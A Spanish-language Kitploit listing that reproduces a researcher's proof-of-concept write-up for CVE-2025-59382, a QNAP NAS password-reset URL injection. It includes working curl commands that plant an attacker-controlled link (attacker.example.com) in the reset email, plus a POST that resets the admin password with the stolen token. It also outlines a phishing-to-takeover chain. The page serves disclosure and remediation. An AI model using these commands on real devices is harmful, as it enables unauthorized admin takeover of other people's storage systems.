Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPhishingPruebas de PenetraciónAprendizaje y Educación
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

Prueba de concepto y análisis técnico para CVE-2025-59382, una inyección de URL de restablecimiento de contraseña no autenticada en QNAP NAS que permite una cadena de phishing a toma de cuentas.

Ver Repositorio
111hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-59382: Reinicio de contraseña de QNAP para toma de cuenta

URL de reinicio de contraseña controlada por atacante no autenticado en /cgi-bin/reset_password.cgi.

Probado contra QuTScloud c5.2.4.3041 build 20250211 en un laboratorio. QNAP luego publicó esto como CVE-2025-59382 en el aviso QSA-26-10.

Versión corta

Un atacante no autenticado con acceso a la red local, o acceso a una interfaz de administración NAS expuesta, puede inyectar una URL arbitraria en el correo electrónico oficial de reinicio de contraseña de QNAP manipulando el parámetro url de la función send_mail en /cgi-bin/reset_password.cgi.

La víctima recibe un correo electrónico real de reinicio de contraseña de QNAP desde el NAS. La URL del atacante se incrusta directamente en el cuerpo HTML del correo, y QNAP agrega el token de reinicio () a esa URL.

rp

Esto convierte el correo de reinicio de contraseña en una cadena limpia de phishing a toma de cuenta:

  1. atacante activa el reinicio de contraseña con su propia URL
  2. NAS envía el correo electrónico real de reinicio de QNAP a la víctima
  3. la víctima hace clic en la URL del atacante
  4. el atacante recibe el token de reinicio rp
  5. la víctima ingresa el código de verificación (vc) en la página de phishing
  6. el atacante restablece la contraseña de administrador e inicia sesión

Requiere interacción de la víctima, pero no autenticación del atacante.

Trigger

root@kitploit:~
curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"

El NAS envía el correo electrónico oficial de reinicio y agrega el token de reinicio a la URL del atacante, por ejemplo:

root@kitploit:~
https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44

El código de verificación también se muestra en el mismo correo electrónico. En la evidencia de laboratorio se veía así:

root@kitploit:~
Your verification code is: 2FEA2B8B

Por lo tanto, la página de phishing solo tiene que pedirle a la víctima el código de verificación. El token rp ya llega al servidor del atacante cuando se hace clic en el enlace.

Reinicio de contraseña

Una vez que el atacante tiene el token rp y el código de verificación vc asociado, puede restablecer la contraseña de administrador:

root@kitploit:~
curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
  "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"

La llamada final de reinicio debe ser un POST. El código de verificación que la víctima ingresa en la página falsa se envía a QNAP como vc=<code>.

La nueva contraseña está codificada en base64 en new_pw. En el PoC esto fue suficiente para cambiar la contraseña de administrador y luego iniciar sesión como administrador.

Por qué funciona

El flujo normal del frontend construye una URL local del NAS como:

root@kitploit:~
location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"

Pero el backend confía en el parámetro url proporcionado por el cliente en lugar de generar la URL de reinicio por sí mismo. Luego construye el enlace del correo usando ese valor y agrega:

root@kitploit:~
&u=<user>&rp=<reset_token>

Simplemente confía en lo que se pase como url.

Impacto

  • activación de correo de reinicio no autenticado
  • el correo oficial de QNAP contiene URL controlada por atacante
  • el token de reinicio se filtra al atacante cuando la víctima hace clic
  • el código de verificación puede ser phishing desde el mismo flujo de correo
  • la cadena de laboratorio demostró el reinicio de contraseña de administrador y el inicio de sesión como administrador

El correo electrónico confiable del NAS está realizando la entrega.

Estado público

  • CVE: CVE-2025-59382
  • Advisory: QSA-26-10
  • Fecha de publicación del aviso de QNAP: 2026-06-17
  • CWE del proveedor: CWE-472
  • CVSS v4.0 del proveedor: 5.1 Medio
  • Estado de QNAP: resuelto

QNAP enumera los productos afectados como:

  • QTS 5.2.7
  • QuTS hero h5.2.8
  • QuTS cloud c5.2.8
  • QVP 2.7.1

Versiones corregidas listadas por QNAP:

  • QTS 5.2.9.3499
  • QuTS hero h5.2.9
  • QuTS cloud C5.2.9
  • QVP 2.8.0

QNAP describió el problema como un atacante remoto que modifica la URL de reinicio de contraseña y engaña a una víctima para que visite una página de reinicio controlada por el atacante, lo que lleva al robo de credenciales.

Mi propio objetivo de laboratorio fue QuTScloud c5.2.4.3041 build 20250211. Mi impacto de laboratorio fue el reinicio de contraseña de administrador y el inicio de sesión como administrador después de la interacción de la víctima.

Nota pequeña: reproduje esto en mi laboratorio el 2026-05-09 y lo envié a QNAP el 2026-05-11; lo marcaron como duplicado de INTSI000-9029. Dado que QNAP ha publicado el CVE/aviso, estoy publicando el POC. Créditos a Tim Coen como el primero en encontrar.

Lo que yo arreglaría

No sé el parche exacto que usó QNAP. Su aviso solo enumera las versiones corregidas.

Mi suposición para la solución correcta es simple: no permitir que el navegador le diga al NAS hacia dónde debe apuntar el enlace de reinicio.

El NAS debería construir ese enlace por sí mismo. Si QNAP aún necesita un parámetro url para el flujo, solo debería aceptar la página de reinicio normal del NAS y rechazar cualquier cosa externa.

También codificaría cualquier cosa que se coloque en el cuerpo del correo electrónico y pondría algún límite de velocidad en las solicitudes de correo de reinicio no autenticadas.

Referencias

  • QNAP advisory: https://www.qnap.com/en/security-advisory/qsa-26-10
  • QNAP CVE JSON: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
  • CVE record: https://www.cve.org/CVERecord?id=CVE-2025-59382

Descargo de responsabilidad: Este código de exploit se publica con fines educativos e investigación defensiva. No lo utilice contra sistemas que no posea o para los que no tenga autorización explícita para probar. El autor no es responsable del mal uso.

Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

Descargar herramienta